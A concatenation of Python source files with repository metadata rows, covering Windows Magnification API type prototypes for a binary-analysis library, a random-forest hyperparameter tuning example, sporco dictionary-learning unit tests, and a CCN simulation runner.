'MagSetWindowTransform': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"v": SimTypeFixedSizeArray(SimTypeFloat(size=32), 9)}, name="MAGTRANSFORM", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hwnd", "pTransform"]),
#
'MagGetWindowTransform': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"v": SimTypeFixedSizeArray(SimTypeFloat(size=32), 9)}, name="MAGTRANSFORM", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hwnd", "pTransform"]),
#
'MagSetWindowFilterList': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hwnd", "dwFilterMode", "count", "pHWND"]),
#
'MagGetWindowFilterList': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hwnd", "pdwFilterMode", "count", "pHWND"]),
#
'MagSetImageScalingCallback': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimStruct({"width": SimTypeInt(signed=False, label="UInt32"), "height": SimTypeInt(signed=False, label="UInt32"), "format": SimTypeBottom(label="Guid"), "stride": SimTypeInt(signed=False, label="UInt32"), "offset": SimTypeInt(signed=False, label="UInt32"), "cbSize": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0)}, name="MAGIMAGEHEADER", pack=False, align=None), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimStruct({"width": SimTypeInt(signed=False, label="UInt32"), "height": SimTypeInt(signed=False, label="UInt32"), "format": SimTypeBottom(label="Guid"), "stride": SimTypeInt(signed=False, label="UInt32"), "offset": SimTypeInt(signed=False, label="UInt32"), "cbSize": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0)}, name="MAGIMAGEHEADER", pack=False, align=None), SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hwnd", "srcdata", "srcheader", "destdata", "destheader", "unclipped", "clipped", "dirty"]), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hwnd", "callback"]),
#
'MagGetImageScalingCallback': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimStruct({"width": SimTypeInt(signed=False, label="UInt32"), "height": SimTypeInt(signed=False, label="UInt32"), "format": SimTypeBottom(label="Guid"), "stride": SimTypeInt(signed=False, label="UInt32"), "offset": SimTypeInt(signed=False, label="UInt32"), "cbSize": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0)}, name="MAGIMAGEHEADER", pack=False, align=None), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimStruct({"width": SimTypeInt(signed=False, label="UInt32"), "height": SimTypeInt(signed=False, label="UInt32"), "format": SimTypeBottom(label="Guid"), "stride": SimTypeInt(signed=False, label="UInt32"), "offset": SimTypeInt(signed=False, label="UInt32"), "cbSize": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0)}, name="MAGIMAGEHEADER", pack=False, align=None), SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hwnd", "srcdata", "srcheader", "destdata", "destheader", "unclipped", "clipped", "dirty"]), offset=0), arg_names=["hwnd"]),
#
'MagSetColorEffect': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"transform": SimTypeFixedSizeArray(SimTypeFloat(size=32), 25)}, name="MAGCOLOREFFECT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hwnd", "pEffect"]),
#
'MagGetColorEffect': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"transform": SimTypeFixedSizeArray(SimTypeFloat(size=32), 25)}, name="MAGCOLOREFFECT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hwnd", "pEffect"]),
#
'MagSetFullscreenTransform': SimTypeFunction([SimTypeFloat(size=32), SimTypeInt(signed=True, label="Int32"), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=True, label="Int32"), arg_names=["magLevel", "xOffset", "yOffset"]),
#
'MagGetFullscreenTransform': SimTypeFunction([SimTypePointer(SimTypeFloat(size=32), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pMagLevel", "pxOffset", "pyOffset"]),
#
'MagSetFullscreenColorEffect': SimTypeFunction([SimTypePointer(SimStruct({"transform": SimTypeFixedSizeArray(SimTypeFloat(size=32), 25)}, name="MAGCOLOREFFECT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pEffect"]),
#
'MagGetFullscreenColorEffect': SimTypeFunction([SimTypePointer(SimStruct({"transform": SimTypeFixedSizeArray(SimTypeFloat(size=32), 25)}, name="MAGCOLOREFFECT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pEffect"]),
#
'MagSetInputTransform': SimTypeFunction([SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["fEnabled", "pRectSource", "pRectDest"]),
#
'MagGetInputTransform': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), SimTypePointer(SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pfEnabled", "pRectSource", "pRectDest"]),
#
'MagShowSystemCursor': SimTypeFunction([SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=True, label="Int32"), arg_names=["fShowCursor"]),
}
lib.set_prototypes(prototypes)
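# Hedged usage sketch (added, not part of the original module): once set, a
# prototype can be inspected straight from the dict. Treating `prototypes` as
# a plain name -> SimTypeFunction mapping is the only assumption; `arg_names`
# and `returnty` are the attributes populated by the constructor calls above.
proto = prototypes['MagShowSystemCursor']
print(proto.arg_names)  # ['fShowCursor']
print(proto.returnty)   # SimTypeInt(signed=True, label="Int32")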
| 180.233333 | 1,952 | 0.718143 | 1,179 | 10,814 | 6.5581 | 0.109415 | 0.221417 | 0.219865 | 0.274832 | 0.847517 | 0.845447 | 0.819969 | 0.819064 | 0.813632 | 0.803026 | 0 | 0.025537 | 0.087479 | 10,814 | 59 | 1,953 | 183.288136 | 0.758006 | 0.002589 | 0 | 0 | 0 | 0 | 0.187419 | 0.02252 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.151515 | 0 | 0.151515 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
fe74843ed9f65cafaa4f076db3ee7925c0d374fb | 2,932 | py | Python | examples/method_examples/random_search_tuning.py | c60evaporator/param_tuning_utility | 8518b76369dcc918172a87ab4c975ee3a12f7045 | [
"BSD-3-Clause"
] | null | null | null | examples/method_examples/random_search_tuning.py | c60evaporator/param_tuning_utility | 8518b76369dcc918172a87ab4c975ee3a12f7045 | [
"BSD-3-Clause"
] | null | null | null | examples/method_examples/random_search_tuning.py | c60evaporator/param_tuning_utility | 8518b76369dcc918172a87ab4c975ee3a12f7045 | [
"BSD-3-Clause"
] | null | null | null | # %% random_search_tuning(), no argument
import parent_import
from muscle_tuning import RFRegressorTuning
from sklearn.datasets import load_boston
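# NOTE (added): sklearn.datasets.load_boston was deprecated in scikit-learn 1.0
# and removed in 1.2, so these examples assume an older scikit-learn release.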
import pandas as pd
# Load dataset
USE_EXPLANATORY = ['CRIM', 'NOX', 'RM', 'DIS', 'LSTAT']
df_boston = pd.DataFrame(load_boston().data, columns=load_boston().feature_names)
X = df_boston[USE_EXPLANATORY].values
y = load_boston().target
tuning = RFRegressorTuning(X, y, USE_EXPLANATORY)
###### Run random_search_tuning() ######
best_params, best_score = tuning.random_search_tuning()
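# Hedged follow-up (added): the call above is written as returning
# (best_params, best_score); printing them is a safe way to inspect the result.
print('best params:', best_params)
print('best score:', best_score)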
# %% random_search_tuning(), Set parameter range by 'tuning_params' argument
import parent_import
from muscle_tuning import RFRegressorTuning
from sklearn.datasets import load_boston
import pandas as pd
# Load dataset
USE_EXPLANATORY = ['CRIM', 'NOX', 'RM', 'DIS', 'LSTAT']
df_boston = pd.DataFrame(load_boston().data, columns=load_boston().feature_names)
X = df_boston[USE_EXPLANATORY].values
y = load_boston().target
tuning = RFRegressorTuning(X, y, USE_EXPLANATORY)
# Set 'tuning_params' argument
CV_PARAMS_RANDOM = {'n_estimators': [20, 30, 40, 60, 80, 120, 160],
'max_features': [2, 3, 4, 5],
'max_depth': [2, 3, 4, 6, 8, 12, 16, 24, 32],
'min_samples_split': [2, 3, 4, 6, 8, 12, 16, 24, 32],
'min_samples_leaf': [1, 2, 3, 4, 6, 8, 12, 16]
}
###### Run random_search_tuning() ######
best_params, best_score = tuning.random_search_tuning(tuning_params=CV_PARAMS_RANDOM,
n_iter=160)
# %% random_search_tuning(), Set estimator by 'estimator' argument
import parent_import
from muscle_tuning import RFRegressorTuning
from sklearn.datasets import load_boston
import pandas as pd
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import RandomForestRegressor
# Load dataset
USE_EXPLANATORY = ['CRIM', 'NOX', 'RM', 'DIS', 'LSTAT']
df_boston = pd.DataFrame(load_boston().data, columns=load_boston().feature_names)
X = df_boston[USE_EXPLANATORY].values
y = load_boston().target
tuning = RFRegressorTuning(X, y, USE_EXPLANATORY)
# Set 'estimator' argument
ESTIMATOR = Pipeline([("scaler", StandardScaler()), ("rf", RandomForestRegressor())])
# Set 'tuning_params' argument
CV_PARAMS_RANDOM = {'n_estimators': [20, 30, 40, 60, 80, 120, 160],
'max_features': [2, 3, 4, 5],
'max_depth': [2, 3, 4, 6, 8, 12, 16, 24, 32],
'min_samples_split': [2, 3, 4, 6, 8, 12, 16, 24, 32],
'min_samples_leaf': [1, 2, 3, 4, 6, 8, 12, 16]
}
###### Run random_search_tuning() ######
best_params, best_score = tuning.random_search_tuning(estimator=ESTIMATOR,
tuning_params=CV_PARAMS_RANDOM,
n_iter=160)
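# Hedged follow-up (added): one way to reuse the tuned settings is to refit the
# pipeline defined above. The 'rf__' prefix matches the Pipeline step name; the
# assumption that best_params holds bare RandomForestRegressor parameter names
# may not match muscle_tuning's actual key format.
ESTIMATOR.set_params(**{'rf__' + k: v for k, v in best_params.items()})
ESTIMATOR.fit(X, y)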
# %%
| 44.424242 | 85 | 0.646999 | 378 | 2,932 | 4.783069 | 0.214286 | 0.066372 | 0.079646 | 0.013274 | 0.816372 | 0.816372 | 0.816372 | 0.816372 | 0.778761 | 0.778761 | 0 | 0.051777 | 0.222715 | 2,932 | 65 | 86 | 45.107692 | 0.741553 | 0.13131 | 0 | 0.795918 | 0 | 0 | 0.0764 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.306122 | 0 | 0.306122 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 8 |
fea19a8189c7ad12a5bca5bacc2b1ea6e197df97 | 11,771 | py | Python | alphacsc/other/sporco/sporco/admm/tests/test_parcnsdl.py | sophiaas/alphacsc | 402b8f6c8ee4ba9c86e9da0e2073d900cf8da207 | [
"BSD-3-Clause"
] | 89 | 2017-05-31T19:20:52.000Z | 2022-03-22T09:52:17.000Z | alphacsc/other/sporco/sporco/admm/tests/test_parcnsdl.py | sophiaas/alphacsc | 402b8f6c8ee4ba9c86e9da0e2073d900cf8da207 | [
"BSD-3-Clause"
] | 75 | 2017-07-15T14:03:40.000Z | 2022-03-29T17:31:58.000Z | alphacsc/other/sporco/sporco/admm/tests/test_parcnsdl.py | sophiaas/alphacsc | 402b8f6c8ee4ba9c86e9da0e2073d900cf8da207 | [
"BSD-3-Clause"
] | 35 | 2017-06-16T12:48:23.000Z | 2022-03-21T09:49:55.000Z | from __future__ import division
from builtins import object
import pytest
import numpy as np
from sporco.admm import parcnsdl
from sporco.admm import cbpdndl
class TestSet01(object):
def setup_method(self, method):
np.random.seed(12345)
N = 16
Nd = 5
M = 4
K = 3
self.D0 = np.random.randn(Nd, Nd, M)
self.S = np.random.randn(N, N, K)
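        # Comment added for clarity: D0 holds M=4 random 5x5 dictionary
        # filters and S holds K=3 random 16x16 training images; the tests
        # below learn dictionaries from these (or similarly shaped) arrays.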
def test_01(self):
lmbda = 1e-1
opt = parcnsdl.ConvBPDNDictLearn_Consensus.Options({'MaxMainIter': 10})
try:
b = parcnsdl.ConvBPDNDictLearn_Consensus(self.D0, self.S[...,0],
lmbda, opt=opt, nproc=2, dimK=0)
b.solve()
except Exception as e:
print(e)
assert(0)
def test_02(self):
lmbda = 1e-1
opt = parcnsdl.ConvBPDNDictLearn_Consensus.Options({'MaxMainIter': 10})
try:
b = parcnsdl.ConvBPDNDictLearn_Consensus(self.D0, self.S, lmbda,
opt=opt, nproc=2)
b.solve()
except Exception as e:
print(e)
assert(0)
def test_03(self):
lmbda = 1e-1
opt = parcnsdl.ConvBPDNDictLearn_Consensus.Options({'MaxMainIter': 10})
try:
b = parcnsdl.ConvBPDNDictLearn_Consensus(self.D0, self.S, lmbda,
opt=opt, nproc=0)
b.solve()
except Exception as e:
print(e)
assert(0)
def test_04(self):
N = 16
Nc = 3
Nd = 5
M = 4
K = 3
D0 = np.random.randn(Nd, Nd, Nc, M)
S = np.random.randn(N, N, Nc, K)
lmbda = 1e-1
opt = parcnsdl.ConvBPDNDictLearn_Consensus.Options({'MaxMainIter': 10})
try:
b = parcnsdl.ConvBPDNDictLearn_Consensus(D0, S, lmbda, opt=opt,
nproc=2)
b.solve()
except Exception as e:
print(e)
assert(0)
def test_05(self):
lmbda = 1e-1
Nit = 10
opts = cbpdndl.ConvBPDNDictLearn.Options(
{'MaxMainIter': Nit, 'AccurateDFid': True,
'CBPDN': {'RelaxParam': 1.0, 'AutoRho': {'Enabled': False}},
'CCMOD': {'RelaxParam': 1.0, 'AutoRho': {'Enabled': False}}})
bs = cbpdndl.ConvBPDNDictLearn(self.D0, self.S, lmbda, opt=opts,
method='cns')
Ds = bs.solve()
optp = parcnsdl.ConvBPDNDictLearn_Consensus.Options(
{'MaxMainIter': Nit, 'CBPDN': {'RelaxParam': 1.0},
'CCMOD': {'RelaxParam': 1.0}})
bp = parcnsdl.ConvBPDNDictLearn_Consensus(self.D0, self.S, lmbda,
opt=optp, nproc=2)
Dp = bp.solve()
assert(np.linalg.norm(Ds - Dp) < 1e-7)
assert(np.abs(bs.getitstat().ObjFun[-1] - bp.getitstat().ObjFun[-1])
< 1e-7)
def test_06(self):
lmbda = 1e-1
Nit = 10
opts = cbpdndl.ConvBPDNDictLearn.Options(
{'MaxMainIter': Nit, 'AccurateDFid': True,
'CBPDN': {'RelaxParam': 1.8, 'AutoRho': {'Enabled': False}},
'CCMOD': {'RelaxParam': 1.8, 'AutoRho': {'Enabled': False}}})
bs = cbpdndl.ConvBPDNDictLearn(self.D0, self.S, lmbda, opt=opts,
method='cns')
Ds = bs.solve()
optp = parcnsdl.ConvBPDNDictLearn_Consensus.Options(
{'MaxMainIter': Nit, 'CBPDN': {'RelaxParam': 1.8},
'CCMOD': {'RelaxParam': 1.8}})
bp = parcnsdl.ConvBPDNDictLearn_Consensus(self.D0, self.S, lmbda,
opt=optp, nproc=2)
Dp = bp.solve()
assert(np.linalg.norm(Ds - Dp) < 1e-7)
assert(np.abs(bs.getitstat().ObjFun[-1] - bp.getitstat().ObjFun[-1])
< 1e-7)
def test_07(self):
lmbda = 1e-1
W = np.array([1.0])
opt = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus.Options(
{'MaxMainIter': 10})
try:
b = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus(self.D0,
self.S[...,0], lmbda, W, opt=opt, nproc=2, dimK=0)
b.solve()
except Exception as e:
print(e)
assert(0)
def test_08(self):
lmbda = 1e-1
W = np.array([1.0])
opt = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus.Options(
{'MaxMainIter': 10})
try:
b = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus(self.D0,
self.S, lmbda, W, opt=opt, nproc=2)
b.solve()
except Exception as e:
print(e)
assert(0)
def test_09(self):
lmbda = 1e-1
W = np.array([1.0])
opt = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus.Options(
{'MaxMainIter': 10})
try:
b = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus(self.D0,
self.S, lmbda, W, opt=opt, nproc=0)
b.solve()
except Exception as e:
print(e)
assert(0)
def test_10(self):
N = 16
Nc = 3
Nd = 5
M = 4
K = 3
D0 = np.random.randn(Nd, Nd, Nc, M)
S = np.random.randn(N, N, Nc, K)
lmbda = 1e-1
W = np.array([1.0])
opt = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus.Options(
{'MaxMainIter': 10})
try:
b = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus(D0,
S, lmbda, W, opt=opt, nproc=2)
b.solve()
except Exception as e:
print(e)
assert(0)
def test_11(self):
lmbda = 1e-1
W = np.array([1.0])
Nit = 10
opts = cbpdndl.ConvBPDNMaskDcplDictLearn.Options(
{'MaxMainIter': Nit, 'AccurateDFid': True,
'CBPDN': {'RelaxParam': 1.0, 'AutoRho': {'Enabled': False}},
'CCMOD': {'RelaxParam': 1.0, 'AutoRho': {'Enabled': False}}})
bs = cbpdndl.ConvBPDNMaskDcplDictLearn(self.D0, self.S, lmbda, W,
opt=opts, method='cns')
Ds = bs.solve()
optp = parcnsdl.ConvBPDNDictLearn_Consensus.Options(
{'MaxMainIter': Nit, 'CBPDN': {'RelaxParam': 1.0},
'CCMOD': {'RelaxParam': 1.0}})
bp = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus(self.D0,
self.S, lmbda, W, opt=optp, nproc=2)
Dp = bp.solve()
assert(np.linalg.norm(Ds - Dp) < 1e-7)
assert(np.abs(bs.getitstat().ObjFun[-1] - bp.getitstat().ObjFun[-1])
< 1e-7)
def test_12(self):
lmbda = 1e-1
W = np.ones(self.S.shape[0:2] + (1, self.S.shape[2], 1))
opt = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus.Options(
{'MaxMainIter': 10})
try:
b = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus(self.D0,
self.S, lmbda, W, opt=opt, nproc=2)
b.solve()
except Exception as e:
print(e)
assert(0)
def test_13(self):
lmbda = 1e-1
W = np.ones(self.S.shape[0:2] + (1, 1, 1))
opt = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus.Options(
{'MaxMainIter': 10})
try:
b = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus(self.D0,
self.S, lmbda, W, opt=opt, nproc=2)
b.solve()
except Exception as e:
print(e)
assert(0)
def test_14(self):
N = 16
Nc = 3
Nd = 5
M = 4
K = 3
D0 = np.random.randn(Nd, Nd, Nc, M)
S = np.random.randn(N, N, Nc, K)
lmbda = 1e-1
W = np.ones(S.shape[0:2] + (1, 1, 1))
opt = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus.Options(
{'MaxMainIter': 10})
try:
b = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus(D0,
S, lmbda, W, opt=opt, nproc=2)
b.solve()
except Exception as e:
print(e)
assert(0)
def test_15(self):
N = 16
Nc = 3
Nd = 5
M = 4
K = 2
D0 = np.random.randn(Nd, Nd, Nc, M)
S = np.random.randn(N, N, Nc, K)
lmbda = 1e-1
W = np.ones(S.shape + (1,))
opt = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus.Options(
{'MaxMainIter': 10})
try:
b = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus(D0,
S, lmbda, W, opt=opt, nproc=2)
b.solve()
except Exception as e:
print(e)
assert(0)
def test_16(self):
lmbda = 1e-1
W = np.ones(self.S.shape[0:2] + (1, 1, 1))
Nit = 10
opts = cbpdndl.ConvBPDNMaskDcplDictLearn.Options(
{'MaxMainIter': Nit, 'AccurateDFid': True,
'CBPDN': {'RelaxParam': 1.0, 'AutoRho': {'Enabled': False}},
'CCMOD': {'RelaxParam': 1.0, 'AutoRho': {'Enabled': False}}})
bs = cbpdndl.ConvBPDNMaskDcplDictLearn(self.D0, self.S, lmbda, W,
opt=opts, method='cns')
Ds = bs.solve()
optp = parcnsdl.ConvBPDNDictLearn_Consensus.Options(
{'MaxMainIter': Nit, 'CBPDN': {'RelaxParam': 1.0},
'CCMOD': {'RelaxParam': 1.0}})
bp = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus(self.D0,
self.S, lmbda, W, opt=optp, nproc=2)
Dp = bp.solve()
assert(np.linalg.norm(Ds - Dp) < 1e-7)
assert(np.abs(bs.getitstat().ObjFun[-1] - bp.getitstat().ObjFun[-1])
< 1e-7)
def test_17(self):
lmbda = 1e-1
W = np.ones(self.S.shape[0:2] + (1, self.S.shape[2], 1))
Nit = 10
opts = cbpdndl.ConvBPDNMaskDcplDictLearn.Options(
{'MaxMainIter': Nit, 'AccurateDFid': True,
'CBPDN': {'RelaxParam': 1.0, 'AutoRho': {'Enabled': False}},
'CCMOD': {'RelaxParam': 1.0, 'AutoRho': {'Enabled': False}}})
bs = cbpdndl.ConvBPDNMaskDcplDictLearn(self.D0, self.S, lmbda, W,
opt=opts, method='cns')
Ds = bs.solve()
optp = parcnsdl.ConvBPDNDictLearn_Consensus.Options(
{'MaxMainIter': Nit, 'CBPDN': {'RelaxParam': 1.0},
'CCMOD': {'RelaxParam': 1.0}})
bp = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus(self.D0,
self.S, lmbda, W, opt=optp, nproc=2)
Dp = bp.solve()
assert(np.linalg.norm(Ds - Dp) < 1e-7)
assert(np.abs(bs.getitstat().ObjFun[-1] - bp.getitstat().ObjFun[-1])
< 1e-7)
def test_18(self):
lmbda = 1e-1
W = np.ones(self.S.shape[0:2] + (1, self.S.shape[2], 1))
Nit = 10
opts = cbpdndl.ConvBPDNMaskDcplDictLearn.Options(
{'MaxMainIter': Nit, 'AccurateDFid': True,
'CBPDN': {'RelaxParam': 1.8, 'AutoRho': {'Enabled': False}},
'CCMOD': {'RelaxParam': 1.8, 'AutoRho': {'Enabled': False}}})
bs = cbpdndl.ConvBPDNMaskDcplDictLearn(self.D0, self.S, lmbda, W,
opt=opts, method='cns')
Ds = bs.solve()
optp = parcnsdl.ConvBPDNDictLearn_Consensus.Options(
{'MaxMainIter': Nit, 'CBPDN': {'RelaxParam': 1.8},
'CCMOD': {'RelaxParam': 1.8}})
bp = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus(self.D0,
self.S, lmbda, W, opt=optp, nproc=2)
Dp = bp.solve()
assert(np.linalg.norm(Ds - Dp) < 1e-7)
assert(np.abs(bs.getitstat().ObjFun[-1] - bp.getitstat().ObjFun[-1])
< 1e-7)
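# Hedged standalone sketch (added): mirrors the constructor calls exercised by
# the tests above, using the same array shapes as setup_method. Only the
# __main__ guard and the final print are new.
if __name__ == '__main__':
    D0 = np.random.randn(5, 5, 4)
    S = np.random.randn(16, 16, 3)
    opt = parcnsdl.ConvBPDNDictLearn_Consensus.Options({'MaxMainIter': 10})
    learner = parcnsdl.ConvBPDNDictLearn_Consensus(D0, S, 1e-1, opt=opt, nproc=2)
    D = learner.solve()
    print(D.shape)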
| 34.620588 | 79 | 0.506924 | 1,327 | 11,771 | 4.452148 | 0.076112 | 0.024543 | 0.033852 | 0.037238 | 0.957685 | 0.957685 | 0.950406 | 0.948375 | 0.948375 | 0.944651 | 0 | 0.043701 | 0.3546 | 11,771 | 339 | 80 | 34.722714 | 0.733974 | 0 | 0 | 0.86532 | 0 | 0 | 0.07493 | 0 | 0 | 0 | 0 | 0 | 0.080808 | 1 | 0.063973 | false | 0 | 0.020202 | 0 | 0.087542 | 0.040404 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
229bf9ec1bd4fd820654c28e13c42e33be9bb0c1 | 2,771 | py | Python | src/ideal_dist_runner.py | chris-wood/ccn-eavesdropper-simulator | e291a1b06ab7f35c40e99f3b42cc7398908b2acb | [
"MIT"
] | null | null | null | src/ideal_dist_runner.py | chris-wood/ccn-eavesdropper-simulator | e291a1b06ab7f35c40e99f3b42cc7398908b2acb | [
"MIT"
] | null | null | null | src/ideal_dist_runner.py | chris-wood/ccn-eavesdropper-simulator | e291a1b06ab7f35c40e99f3b42cc7398908b2acb | [
"MIT"
] | 1 | 2019-11-10T19:09:21.000Z | 2019-11-10T19:09:21.000Z | from runner import *
from network import *
Ts = range(10, 10000, 1000)
S = 16
N = 1000
processes = []
for T in Ts:
    # The original unrolled this loop once per alpha value; a nested loop is
    # equivalent and removes the duplication.
    for alpha in (1.5, 1.6, 1.7, 1.8, 1.9, 2.0, 2.1, 2.2, 2.3, 2.4, 2.5):
        fout = "ideal_dist_%d_%f.txt" % (T, alpha)
        # Bind alpha via a default argument so each lambda keeps its own value;
        # a bare closure over the loop variable would see only the final 2.5.
        processes.append(create_simulation(T, N, S, 1, create_path,
                                           lambda items: ZipfDistribution(1.5, items),
                                           lambda items, a=alpha: ZipfDistribution(a, items),
                                           1.0, 0.0, fout))
for p in processes:
p.start()
for p in processes:
p.join()
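# Note (added): on platforms that spawn rather than fork (e.g. Windows),
# creating processes at module top level like this normally needs an
# `if __name__ == '__main__':` guard; the script as written assumes fork
# semantics on a Unix-like system.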
